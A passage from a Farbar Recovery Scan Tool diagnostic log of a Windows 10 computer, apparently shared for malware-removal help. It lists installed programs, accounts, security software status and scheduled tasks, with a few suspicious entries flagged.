    C:\Users\Kym\AppData\Local\Temp\raptrpatch.exe
    C:\Users\Kym\AppData\Local\Temp\raptr_stub.exe
    C:\Users\Kym\AppData\Local\Temp\readSTILog.dll
    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-02-29 12:25

    ==================== End of FRST.txt ============================

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
    Ran by Kym (2016-02-29 20:46:27)
    Running from C:\Users\Kym\Desktop
    Windows 10 Home (X64) (2015-08-08 15:48:30)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
    Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
    Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
    AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
    Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
    Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
    AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
    Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
    Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
    Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
    Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
    Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
    Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
    Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
    BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
    BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
    BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
    Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
    Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
    Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
    Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
    Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
    Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
    Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
    Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
    Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
    Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
    Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
    Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
    Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
    IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
    iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
    Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
    Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
    iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
    Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
    Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
    League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
    League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
    Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
    Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
    Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
    LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
    LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
    Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
    Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
    Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
    Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
    Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
    Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
    Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
    Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
    NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
    ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
    ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
    Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
    OpenAL (HKLM-x32\...\OpenAL) (Version: - )
    Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
    PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
    PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
    PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
    Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
    Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
    Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
    Scansoft PDF Professional (x32 Version: - ) Hidden
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
    Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
    Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
    Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
    Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
    StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
    TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
    TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
    The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
    Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
    Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
    Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
    Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
    World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
    Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
    Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
    Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
    Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
    Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
    Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
    Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
    Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
    Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
    Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
    Task: {40943A4E-8129-4656-ADEA-C3441A09E687} - System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D} => /s /n /i:"/rt" "C:\PROGRA~3\3c355888\4543324a.dll"
    Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
    Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
    Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
    Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
    Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
    Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
    Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
    Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
    Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
    Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
    Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
    Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
    Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
    Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
